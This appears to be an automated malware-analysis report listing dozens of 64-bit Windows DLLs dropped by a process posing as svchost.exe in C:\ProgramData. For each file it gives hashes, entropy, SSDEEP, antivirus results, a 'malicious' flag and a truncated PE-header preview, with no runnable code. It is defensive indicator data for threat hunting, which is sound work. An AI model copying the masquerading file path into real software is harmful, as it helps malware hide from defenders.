                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..`&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):26224
                                                                                        Entropy (8bit):4.864482970861573
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:xaNYPvVX8rFTsiWhhWWnWGxVA6VWQ4cRWtlAd9ZnAOVX01k9z3AAcosm6:nPvVXkWhhWQxdlP31AqR9z76
                                                                                        MD5:EA00855213F278D9804105E5045E2882
                                                                                        SHA1:07C6141E993B21C4AA27A6C2048BA0CFF4A75793
                                                                                        SHA-256:F2F74A801F05AB014D514F0F1D0B3DA50396E6506196D8BECCC484CD969621A6
                                                                                        SHA-512:B23B78B7BD4138BB213B9A33120854249308BB2CF0D136676174C3D61852A0AC362271A24955939F04813CC228CD75B3E62210382A33444165C6E20B5E0A7F24
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P............`A........................................p................@...............@..p&..............p............................................................................rdata..|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.615608208407289
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:4TGaWhhWMWvkJ0f5AbVWQ4cRWhW9qUd9ZnAOVX01k9z3AAcoXXcX:4qaWhhWIaablbR31AqR9z77MX
                                                                                        MD5:BCB8B9F6606D4094270B6D9B2ED92139
                                                                                        SHA1:BD55E985DB649EADCB444857BEED397362A2BA7B
                                                                                        SHA-256:FA18D63A117153E2ACE5400ED89B0806E96F0627D9DB935906BE9294A3038118
                                                                                        SHA-512:869B2B38FD528B033B3EC17A4144D818E42242B83D7BE48E2E6DA6992111758B302F48F52E0DD76BECB526A90A2B040CE143C6D4F0E009A513017F06B9A8F2B9
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@............`A........................................p...L............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):18696
                                                                                        Entropy (8bit):7.054510010549814
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
                                                                                        MD5:BFFFA7117FD9B1622C66D949BAC3F1D7
                                                                                        SHA1:402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
                                                                                        SHA-256:1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
                                                                                        SHA-512:B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22128
                                                                                        Entropy (8bit):4.625038284904601
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:9jWhhWmWGxVA6VWQ4cRWMj656CqRqNX01k9z3A8oXblIHNQ:9jWhhWSxdlE5DNR9zrG6Ha
                                                                                        MD5:D584C1E0F0A0B568FCE0EFD728255515
                                                                                        SHA1:2E5CE6D4655C391F2B2F24FC207FDF0E6CD0CC2A
                                                                                        SHA-256:3DE40A35254E3E0E0C6DB162155D5E79768A6664B33466BF603516F3743EFB18
                                                                                        SHA-512:C7D1489BF81E552C022493BB5A3CD95CCC81DBEDAAA8FDC0048CACBD087913F90B366EEB4BF72BF4A56923541D978B80D7691D96DBBC845625F102C271072C42
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.723757189784349
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:bdxlxWhhWWWvkJ0f5AbVWQ4cRWKmX56CqRqNX01k9z3A8oXjl:bdxlxWhhW2aablm5DNR9zrG
                                                                                        MD5:6168023BDB7A9DDC69042BEECADBE811
                                                                                        SHA1:54EE35ABAE5173F7DC6DAFC143AE329E79EC4B70
                                                                                        SHA-256:4EA8399DEBE9D3AE00559D82BC99E4E26F310934D3FD1D1F61177342CF526062
                                                                                        SHA-512:F1016797F42403BB204D4B15D75D25091C5A0AB8389061420E1E126D2214190A08F02E2862A2AE564770397E677B5BCDD2779AB948E6A3E639AA77B94D0B3F6C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@......).....`A........................................p................0...............0..h&..............p............................................................................rdata..|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.654830959351148
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:r4WhhWWsWvkJ0f5AbVWQ4cRWsQOZD2X01k9z3AG2hqvz:0WhhWRaablKZR9zVQM
                                                                                        MD5:4F631924E3F102301DAC36B514BE7666
                                                                                        SHA1:B3740A0ACDAF3FBA60505A135B903E88ACB48279
                                                                                        SHA-256:E2406077621DCE39984DA779F4D436C534A31C5E863DB1F65DE5939D962157AF
                                                                                        SHA-512:56F9FB629675525CBE84A29D44105B9587A9359663085B62F3FBE3EEA66451DA829B1B6F888606BC79754B6B814CA4A1B215F04F301EFE4DB0D969187D6F76F1
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......x.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.868673796157719
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:oTvuBL3BBLIWhhW5WvkJ0f5AbVWQ4cRWsmIngqtVVwX01k9z3Acqk3:oTvuBL3BaWhhWhaablkqVwR9zHR
                                                                                        MD5:8DFC224C610DD47C6EC95E80068B40C5
                                                                                        SHA1:178356B790759DC9908835E567EDFB67420FBAAC
                                                                                        SHA-256:7B8C7E09030DF8CDC899B9162452105F8BAEB03CA847E552A57F7C81197762F2
                                                                                        SHA-512:FE5BE81BFCE4A0442DD1901721F36B1E2EFCDCEE1FDD31D7612AD5676E6C5AE5E23E9A96B2789CB42B7B26E813347F0C02614937C561016F1563F0887E69BBEE
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@......fK....`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22128
                                                                                        Entropy (8bit):5.357912030694384
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:jnaOMw3zdp3bwjGzue9/0jCRrndbnWhhWRxdlF5DNR9zrGDLC:mOMwBprwjGzue9/0jCRrndbemr9zay
                                                                                        MD5:20DDF543A1ABE7AEE845DE1EC1D3AA8E
                                                                                        SHA1:0EAF5DE57369E1DB7F275A2FFFD2D2C9E5AF65BF
                                                                                        SHA-256:D045A72C3E4D21165E9372F76B44FF116446C1E0C221D9CEA3AB0A1134A310E8
                                                                                        SHA-512:96DD48DF315A7EEA280CA3DA0965A937A649EE77A82A1049E3D09B234439F7D927D7FB749073D7AF1B23DADB643978B70DCDADC6C503FE850B512B0C9C1C78DD
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.755674101565431
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:q8WhhWUWvkJ0f5AbVWQ4cRW9RvBwUoX01k9z3AuJGzx:q8WhhWgaablSUR9zxk
                                                                                        MD5:C4098D0E952519161F4FD4846EC2B7FC
                                                                                        SHA1:8138CA7EB3015FC617620F05530E4D939CAFBD77
                                                                                        SHA-256:51B2103E0576B790D5F5FDACB42AF5DAC357F1FD37AFBAAF4C462241C90694B4
                                                                                        SHA-512:95AA4C7071BC3E3FA4DB80742F587A0B80A452415C816003E894D2582832CF6EAC645A26408145245D4DEABE71F00ECCF6ADB38867206BEDD5AA0A6413D241F5
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......E.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22128
                                                                                        Entropy (8bit):4.706939855964842
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:vyWhhWQWGxVA6VWQ4cRWzco456CqRqNX01k9z3A8oXdlxG:KWhhWoxdlvo45DNR9zrGhG
                                                                                        MD5:EAF36A1EAD954DE087C5AA7AC4B4ADAD
                                                                                        SHA1:9DD6BC47E60EF90794A57C3A84967B3062F73C3C
                                                                                        SHA-256:CDBA9DC9AF63EBD38301A2E7E52391343EFEB54349FC2D9B4EE7B6BF4F9CF6EB
                                                                                        SHA-512:1AF9E60BF5C186CED5877A7FA690D9690B854FAA7E6B87B0365521EAFB7497FB7370AC023DB344A6A92DB2544B5BDC6E2744C03B10C286EBBF4F57C6CA3722CF
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@.......Y....`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.879924502333097
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:nEFPmWhhWiWvkJ0f5AbVWQ4cRWdEnZBwUoX01k9z3AuJGzCM:EFuWhhW6aablNZUR9zx
                                                                                        MD5:8711E4075FA47880A2CB2BB3013B801A
                                                                                        SHA1:B7CEEC13E3D943F26DEF4C8A93935315C8BB1AC3
                                                                                        SHA-256:5BCC3A2D7D651BB1ECC41AA8CD171B5F2B634745E58A8503B702E43AEE7CD8C6
                                                                                        SHA-512:7370E4ACB298B2E690CCD234BD6C95E81A5B870AE225BC0AD8FA80F4473A85E44ACC6159502085FE664075AFA940CFF3DE8363304B66A193AC970CED1BA60AAE
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@...........`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):5.227317911828185
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:Lck1JzNcKSI8WhhWCaabl5ujezWSR9zchTL:TcKS+Hznwq9zS
                                                                                        MD5:8E6EB11588FA9625B68960A46A9B1391
                                                                                        SHA1:FF81F0B3562E846194D330FADF2AB12872BE8245
                                                                                        SHA-256:AE56E19DA96204E7A9CDC0000F96A7EF15086A9FE1F686687CB2D6FBCB037CD6
                                                                                        SHA-512:FDB97D1367852403245FC82CB1467942105E4D9DB0DE7CF13A73658905139BB9AE961044BEB0A0870429A1E26FE00FC922FBD823BD43F30F825863CAD2C22CEA
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......=M....`A........................................p................0...............0..h&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.788678681522991
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:fkDfIecWhhW/WvkJ0f5AbVWQ4cRWSXgp13s5yX01k9z3A3MLGO:fkDfIecWhhWLaabl4cYR9zEM3
                                                                                        MD5:4380D56A3B83CA19EA269747C9B8302B
                                                                                        SHA1:0C4427F6F0F367D180D37FC10ECBE6534EF6469C
                                                                                        SHA-256:A79C7F86462D8AB8A7B73A3F9E469514F57F9FE456326BE3727352B092B6B14A
                                                                                        SHA-512:1C29C335C55F5F896526C8EE0F7160211FD457C1F1B98915BCC141112F8A730E1A92391AB96688CBB7287E81E6814CC86E3B057E0A6129CBB02892108BFAFAF4
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.583429497884519
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:SWhhWpWvkJ0f5AbVWQ4cRWlwbx56CqRqNX01k9z3A8oXnlSP:SWhhWRaablbN5DNR9zrGQ
                                                                                        MD5:9082D23943B0AA48D6AF804A2F3609A2
                                                                                        SHA1:C11B4E12B743E260E8B3C22C9FACE83653D02EFE
                                                                                        SHA-256:7ECC2E3FE61F9166FF53C28D7CB172A243D94C148D3EF13545BC077748F39267
                                                                                        SHA-512:88434A2B996ED156D5EFFBB7960B10401831E9B2C9421A0029D2D8FA651B9411F973E988565221894633E9FFCD6512F687AFBB302EFE2273D4D1282335EE361D
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22112
                                                                                        Entropy (8bit):4.750751888281197
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:xGeVvWhhWN6WvkJ0f5AbVWQ4OW7bplZD2X01k9z3AG2LzS4:xGeVvWhhWNCaab2pyR9zV2zS4
                                                                                        MD5:772F1B596A7338F8EA9DDFF9ABA9447D
                                                                                        SHA1:CDA9F4B9808E9CEF2AEAC2AC6E7CDF0E8687C4C5
                                                                                        SHA-256:CC1BFCE8FE6F9973CCA15D7DFCF339918538C629E6524F10F1931AE8E1CD63B4
                                                                                        SHA-512:8C94890C8F0E0A8E716C777431022C2F77B69EBFAA495D541E2D3312AE1DA307361D172EFCE94590963D17FE3FCAC8599DCABE32AB56E01B4D9CF9B4F0478277
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@......7.....`A........................................p...<............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22128
                                                                                        Entropy (8bit):4.664471809242636
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:7ZyMvrRWhhW8WGxVA6VWQ4cRWquEg56CqRqNX01k9z3A8oXW98laI:7ZyMvdWhhW8xdlq5DNR9zrG2o
                                                                                        MD5:84B1347E681E7C8883C3DC0069D6D6FA
                                                                                        SHA1:9E62148A2368724CA68DFA5D146A7B95C710C2F2
                                                                                        SHA-256:1CB48031891B967E2F93FDD416B0324D481ABDE3838198E76BC2D0CA99C4FD09
                                                                                        SHA-512:093097A49080AEC187500E2A9E9C8CCD01F134A3D8DC8AB982E9981B9DE400DAE657222C20FB250368ECDDC73B764B2F4453AB84756B908FCB16DF690D3F4479
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@.......t....`A........................................p................0...............0..p&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):5.1446624716472735
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:xEwidv3V0dfpkXc0vVaCUWhhWHaablKR9zVR:aHdv3VqpkXc0vVa4qzE9z
                                                                                        MD5:6EA31229D13A2A4B723D446F4242425B
                                                                                        SHA1:036E888B35281E73B89DA1B0807EA8E89B139791
                                                                                        SHA-256:8ECCABA9321DF69182EE3FDB8FC7D0E7615AE9AD3B8CA53806ED47F4867395AE
                                                                                        SHA-512:FA834E0E54F65D9A42AD1F4FB1086D26EDFA182C069B81CFF514FEB13CFCB7CB5876508F1289EFBC2D413B1047D20BAB93CED3E5830BF4A6BB85468DECD87CB6
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@......zM....`A........................................p...X............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.827260305412209
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ptZ3pWhhWpaWvkJ0f5AbVWQ4cRWTjPtngqtVVwX01k9z3AcVj:ptZ3pWhhWEaablmrVwR9zHp
                                                                                        MD5:DD6F223B4F9B84C6E9B2A7CF49B84FC7
                                                                                        SHA1:2EE75D635D21D628E8083346246709A71B085710
                                                                                        SHA-256:8356F71C5526808AF2896B2D296CE14E812E4585F4D0C50D7648BC851B598BEF
                                                                                        SHA-512:9C12912DAEA5549A3477BAA2CD05180702CF24DD185BE9F1FCA636DB6FBD25950C8C2B83F18D093845D9283C982C0255D6402E3CDEA0907590838E0ACB8CC8C1
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......c....`A........................................p...x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22128
                                                                                        Entropy (8bit):4.913093601910681
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:yaIMFSgWhhW5JWGxVA6VWQ4cRWpRTJz56CqRqNX01k9z3A8oX/ld:ydgWhhW/xdlATh5DNR9zrGP
                                                                                        MD5:9CA65D4FE9B76374B08C4A0A12DB8D2F
                                                                                        SHA1:A8550D6D04DA33BAA7D88AF0B4472BA28E14E0AF
                                                                                        SHA-256:8A1E56BD740806777BC467579BDC070BCB4D1798DF6A2460B9FE36F1592189B8
                                                                                        SHA-512:19E0D2065F1CA0142B26B1F5EFDD55F874F7DDE7B5712DD9DFD4988A24E2FCD20D4934BDDA1C2D04B95E253AA1BEE7F1E7809672D7825CD741D0F6480787F3B3
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.818883643812602
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:MNBWhhWXWvkJ0f5AbVWQ4cRWysu56CqRqNX01k9z3A8oXPl1D:MXWhhWzaablb5DNR9zrGnD
                                                                                        MD5:2554060F26E548A089CAB427990AACDF
                                                                                        SHA1:8CC7A44A16D6B0A6B7ED444E68990FF296D712FE
                                                                                        SHA-256:5AB003E899270B04ABC7F67BE953EACCF980D5BBE80904C47F9AAF5D401BB044
                                                                                        SHA-512:FD4D5A7FE4DA77B0222B040DC38E53F48F7A3379F69E2199639B9F330B2E55939D89CE8361D2135182B607AD75E58EE8E34B90225143927B15DCC116B994C506
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@......JH....`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.599642754410154
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:5WhhWqMWvkJ0f5AbVWQ4cRWHLlDrwLobDX01k9z3AU93mldvQ:5WhhWqIaablklDMyDR9z/93mldvQ
                                                                                        MD5:427F0E19148D98012968564E4B7E622A
                                                                                        SHA1:488873EB98133E20ACD106B39F99E3EBDFACA386
                                                                                        SHA-256:0CBACACCEDAF9B6921E6C1346DE4C0B80B4607DACB0F7E306A94C2F15FA6D63D
                                                                                        SHA-512:03FA49BDADB65B65EFED5C58107912E8D1FCCFA13E9ADC9DF4441E482D4B0EDD6FA1BD8C8739CE09654B9D6A176E749A400418F01D83E7AE50FA6114D6AEAD2B
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.9059107418499295
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:Xv0WhhW4WvkJ0f5AbVWQ4cRWG142Jp13s5yX01k9z3A3MIMttG5+:sWhhW8aabllxcYR9zEMIM3
                                                                                        MD5:42EE890E5E916935A0D3B7CDEE7147E0
                                                                                        SHA1:D354DB0AAC3A997B107EC151437EF17589D20CA5
                                                                                        SHA-256:91D7A4C39BAAC78C595FC6CF9FD971AA0A780C297DA9A8B20B37B0693BDCD42C
                                                                                        SHA-512:4FAE6D90D762ED77615D0F87833152D16B2C122964754B486EA90963930E90E83F3467253B7ED90D291A52637374952570BD9036C6B8C9EAEBE8B05663EBB08E
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......[.....`A.........................................................0...............0..h&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):26224
                                                                                        Entropy (8bit):4.884873448198051
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:p9cyRWhhWnWGxVA6VWQ4cRWstTmil56CqRqNX01k9z3A8oXMQlE5V:YyRWhhWfxdlv3l5DNR9zrGMH
                                                                                        MD5:33B85A64C4AF3A65C4B72C0826668500
                                                                                        SHA1:315DDB7A49283EFE7FCAE1B51EBD6DB77267D8DF
                                                                                        SHA-256:8B24823407924688ECAFC771EDD9C58C6DBCC7DE252E7EBD20751A5B9DD7ABEF
                                                                                        SHA-512:B3A62CB67C7FE44CA57AC16505A9E9C3712C470130DF315B591A9D39B81934209C8B48B66E1E18DA4A5323785120AF2D9E236F39C9B98448F88ADAB097BC6651
                                                                                        Malicious:true
